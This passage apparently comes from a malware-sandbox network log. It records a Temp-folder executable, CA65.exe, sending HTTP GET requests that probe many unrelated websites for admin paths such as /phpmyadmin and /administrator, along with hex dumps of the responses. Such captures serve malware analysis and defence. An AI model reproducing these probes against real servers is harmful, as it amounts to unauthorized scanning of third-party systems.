2023-12-22 20:14:53 UTC	1369	IN	Data Raw: 63 65 2d 6f 72 64 65 72 2d 62 74 6e 20 70 61 79 6d 65 6e 74 70 61 79 2d 61 63 63 61 75 6e 74 2d 63 6f 6e 74 65 6e 74 2d 62 74 6e 20 62 74 6e 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 37 33 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 Data Ascii: ce-order-btn paymentpay-accaunt-content-btn btn hiddenAtLoad" onclick="return false;" style="height:50px; margin-left:0px; min-width:273px; margin-top:0px; margin-bottom:25px; display:flex;">Processing<div class="circularJ"><div class="circularJ_1"></di
2023-12-22 20:14:53 UTC	1369	IN	Data Raw: 69 43 68 65 6d 2e 63 6f 6d 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 20 69 64 3d 22 6c 61 6e 64 65 72 46 6f 72 6d 44 33 36 35 37 30 42 45 43 39 45 32 34 30 34 31 38 36 31 37 41 30 30 36 42 34 34 34 41 32 44 32 49 44 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 63 61 72 74 43 68 65 63 6b 22 20 76 61 6c 75 65 3d 22 30 22 20 69 64 3d 22 6c 61 6e 64 65 72 46 6f 72 6d 44 33 36 35 37 30 42 45 43 39 45 32 34 30 34 31 38 36 31 37 41 30 30 36 42 34 34 34 41 32 44 32 43 68 65 63 6b 49 44 22 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 61 6e 64 65 72 46 75 6e 63 44 33 36 35 37 30 42 45 43 39 45 32 34 30 34 31 38 36 31 37 41 30 30 36 42 34 34 34 41 32 44 32 46 75 6e 63 28 29 Data Ascii: iChem.com" method="post" id="landerFormD36570BEC9E240418617A006B444A2D2ID"><input type="hidden" name="cartCheck" value="0" id="landerFormD36570BEC9E240418617A006B444A2D2CheckID"></form><script>function landerFuncD36570BEC9E240418617A006B444A2D2Func()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	57066	13.248.169.48	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	342	OUT	GET /administrator/ HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:53 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:53 GMT Content-Type: text/html Content-Length: 12976 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-32b0" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_czzm9ZxXVEn1dVI29Z6jRI2i+FWHGEjGTRViM2xTsi15oNn8SHtgVXPMFlpIma2YY93EMULC6YvS/zZ8PBH0DA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:53 UTC	12976	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	57746	34.149.87.45	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	184	OUT	GET /phpmyadmin HTTP/1.1 Host: www.valentinegrowers.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:53 UTC	1079	IN	HTTP/1.1 404 Not Found Content-Length: 2929 Content-Type: text/html; charset=UTF-8 Content-Language: en Strict-Transport-Security: max-age=3600 X-Wix-Request-Id: 1703276093.5641710117768332419 Age: 0 Cache-Control: no-cache Server: Pepyaka/1.19.10 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Fri, 22 Dec 2023 20:14:53 GMT X-Served-By: cache-dfw-kdfw8210171-DFW X-Cache: MISS Vary: Accept-Encoding Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLjBdxec7r7DHGEpZo2ij+25kavE0ZtMXws1mfakihq4B,2d58ifebGbosy5xc+FRaltlOn5j/0eVBOGXKOxAOAW8tZ93ln3wWUeYAzsrIvdeDBPgnJapQZzYOLCPasOijsQ==,2UNV7KOq4oGjA5+PKsX47JzIq9ZmP05BQuFbD4KFyTFYgeUJqUXtid+86vZww+nL,VmI+uz0B2qfdV6wbOCEtb2BkR6NTdWt8IJ3Oyc5f+zc=,q4Lmhk3LuY9WzSLOm0WLKV0xpIl3PUTIhAv9hKeMcO0=,WDMzHiyOL7uW518fW2Byr06xHPCK537k6EVzpMSs4DH99KqBTwExals4cOXLszKDtqhJvaMlJuqJm4JppQlSfA== Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-12-22 20:14:53 UTC	173	IN	Data Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-
2023-12-22 20:14:53 UTC	1252	IN	Data Raw: 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' \| translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="
2023-12-22 20:14:53 UTC	1252	IN	Data Raw: 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 Data Ascii: party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/e
2023-12-22 20:14:53 UTC	252	IN	Data Raw: 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <div class="non-angular-supported-browser-link"> <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	57732	167.235.0.29	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	185	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:53 UTC	382	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 34 3a 35 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 3a 20 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTServer: ApacheX-XSS-Protection: 1; mode=blockAccess-Control-Allow-Origin: Access-Control-Allow-Headers: Access-Control-Allow-Methods: Access-Control-Request-Method: Content-Secur
2023-12-22 20:14:53 UTC	7810	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 0d 0a 20 20 20 20 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 74 6f 65 73 74 75 64 69 6f 6d 69 72 65 74 2e 63 6f 6d 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: <!DOCTYPE html><html lang="es"> <head> <style>html,body{background-color:;}</style><base href="https://www.fotoestudiomiret.com" /><meta charset="utf-8" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http
2023-12-22 20:14:54 UTC	16384	IN	Data Raw: 69 6f 6e 2d 63 69 72 63 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 22 2c 22 65 78 70 61 6e 64 22 3a 22 66 61 73 20 66 61 2d 65 78 70 61 6e 64 22 2c 22 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 3a 22 66 61 73 20 66 61 2d 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 2c 22 65 79 65 22 3a 22 66 61 73 20 66 61 2d 65 79 65 22 2c 22 65 79 65 2d 73 6c 61 73 68 22 3a 22 66 61 73 20 66 61 2d 65 79 65 2d 73 6c 61 73 68 22 2c 22 66 61 63 65 2d 67 72 69 6e 22 3a 22 66 61 73 20 66 61 2d 67 72 69 6e 22 2c 22 66 61 63 65 62 6f 6f 6b 22 3a 22 66 61 62 Data Ascii: ion-circle","exclamation-triangle":"fas fa-exclamation-triangle","exclamation":"fas fa-exclamation","expand":"fas fa-expand","external-link":"fas fa-external-link","eye":"fas fa-eye","eye-slash":"fas fa-eye-slash","face-grin":"fas fa-grin","facebook":"fab
2023-12-22 20:14:54 UTC	16384	IN	Data Raw: 6f 73 73 68 61 69 72 73 22 3a 22 66 61 6c 20 66 61 2d 63 72 6f 73 73 68 61 69 72 73 22 2c 22 63 73 73 33 22 3a 22 66 61 62 20 66 61 2d 63 73 73 33 22 2c 22 63 75 62 65 73 22 3a 22 66 61 73 20 66 61 2d 63 75 62 65 73 22 2c 22 64 65 6c 69 63 69 6f 75 73 22 3a 22 66 61 62 20 66 61 2d 64 65 6c 69 63 69 6f 75 73 22 2c 22 64 65 73 6b 74 6f 70 22 3a 22 66 61 73 20 66 61 2d 64 65 73 6b 74 6f 70 22 2c 22 64 65 76 69 61 6e 74 61 72 74 22 3a 22 66 61 62 20 66 61 2d 64 65 76 69 61 6e 74 61 72 74 22 2c 22 64 6f 74 2d 63 69 72 63 6c 65 22 3a 22 66 61 72 20 66 61 2d 64 6f 74 2d 63 69 72 63 6c 65 22 2c 22 64 6f 77 6e 6c 6f 61 64 22 3a 22 66 61 73 20 66 61 2d 64 6f 77 6e 6c 6f 61 64 22 2c 22 64 72 69 62 62 62 6c 65 22 3a 22 66 61 62 20 66 61 2d 64 72 69 62 62 62 6c 65 22 Data Ascii: osshairs":"fal fa-crosshairs","css3":"fab fa-css3","cubes":"fas fa-cubes","delicious":"fab fa-delicious","desktop":"fas fa-desktop","deviantart":"fab fa-deviantart","dot-circle":"far fa-dot-circle","download":"fas fa-download","dribbble":"fab fa-dribbble"
2023-12-22 20:14:54 UTC	16384	IN	Data Raw: 22 20 64 61 74 61 2d 6c 65 76 65 6c 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 64 61 74 61 2d 63 6f 6c 6c 61 70 73 65 3d 22 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 64 61 74 61 2d 73 75 63 63 65 73 73 3d 22 66 61 2d 63 61 72 65 74 2d 64 6f 77 6e 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 75 6c 20 Data Ascii: " data-level="0"> <i class="fas fa-caret-right default-fasize" aria-hidden="true" data-collapse="fa-caret-right default-fasize" data-success="fa-caret-down default-fasize"></i> </a></div><ul
2023-12-22 20:14:54 UTC	12337	IN	Data Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 0a 20 20 3c 64 69 76 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 74 65 78 74 27 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 2d 74 65 78 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 62 75 74 74 6f 6e 73 27 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 Data Ascii: justify-content: flex-end; margin-top: 2em; margin-bottom: 1em; } </style> <div id="aviso-cookies"> <div class='aviso-cookie-text' id="aviso-cookies-text"> </div> <div class='aviso-cookie-buttons'> <a href="https://w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	57715	89.46.108.50	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	176	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.covicol.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	57611	20.197.30.48	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	182	OUT	GET //phpmyadmin/ HTTP/1.1 Host: trivandrum.german.in Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:54 UTC	1105	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 34 3a 35 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6e 41 34 4d 46 5a 52 53 32 5a 33 63 6c 70 57 54 32 4a 31 56 33 42 4b 61 45 68 6f 56 48 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 64 54 4a 51 4f 44 52 4d 55 31 42 33 4b 30 52 73 52 6a 42 52 5a 46 4e 68 4e 55 4a 4a 53 48 55 78 65 55 31 4b 4f 53 39 69 5a 44 42 32 56 6c 4a 56 4c Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTServer: Apache/2.4.41 (Ubuntu)Cache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6InA4MFZRS2Z3clpWT2J1V3BKaEhoVHc9PSIsInZhbHVlIjoidTJQODRMU1B3K0RsRjBRZFNhNUJJSHUxeU1KOS9iZDB2VlJVL
2023-12-22 20:14:54 UTC	1945	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 20 7c 20 57 65 6c 63 6f 6d 65 20 74 6f 20 4a 6f 73 68 20 46 72 6f 6e 74 65 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f Data Ascii: <!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 page \| Welcome to Josh Frontend</title> <meta content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	58322	34.206.39.153	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	196	OUT	GET / HTTP/1.1 Host: www.org.com Accept: / Accept-Encoding: deflate, gzip Cookie: SERVERID=vpc3\|ZYXxG\|ZYXxG User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:53 UTC	2152	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Dec 2023 20:14:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL/3/SrV7P8AsTHMFSpPmYbyv2PkACHwmG9Z+1IFZq3vA54IN7pQcGnhgNo+8SN9r/KtUWCb9OPqTfWM1N4w/EUCAwEAAQ==_KMXX1whE+LqWlnBOIB0xJLwpzXTVIVXwtPxBqo7TtwcgcTbCRX6lgnGBFcKSpdQQU799kZ0mJJU8T3hRE6kHVQ== Access-Control-Allow-Origin: * Access-Control-Allow-Methods: * Access-Control-Request-Method: * Access-Control-Allow-Headers: * Access-Control-Max-Age: 86400 Link: </packs/js/abp2-e13b4cce38d2e6b3aea7.js>; rel=preload; as=script; nopush,</packs/js/ads-4b8a83b0bbaf60e589e0.js>; rel=preload; as=script; nopush,</packs/js/abp2-e13b4cce38d2e6b3aea7.js>; rel=preload; as=script; nopush,</assets/application-89128245420e03526773926b09a5a7512357bf5fc597732c13596d8a84efe0b7.css>; rel=preload; as=style; nopush,</packs/js/application-28182f954f58ae153a93.js>; rel=preload; as=script; nopush,</assets/style-89128245420e03526773926b09a5a7512357bf5fc597732c13596d8a84efe0b7.css>; rel=preload; as=style; nopush,</assets/generic_lander-8c18c01aab6b1d2ebf833256e6dbdff67d20807e508d45e59875a48594655ea7.css>; rel=preload; as=style; nopush,<///ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js>; rel=preload; as=script; nopush Vary: Accept ETag: W/"3afaa47978545d6bfefa7a0f5f4a47a0" Cache-Control: max-age=0, private, must-revalidate Set-Cookie: 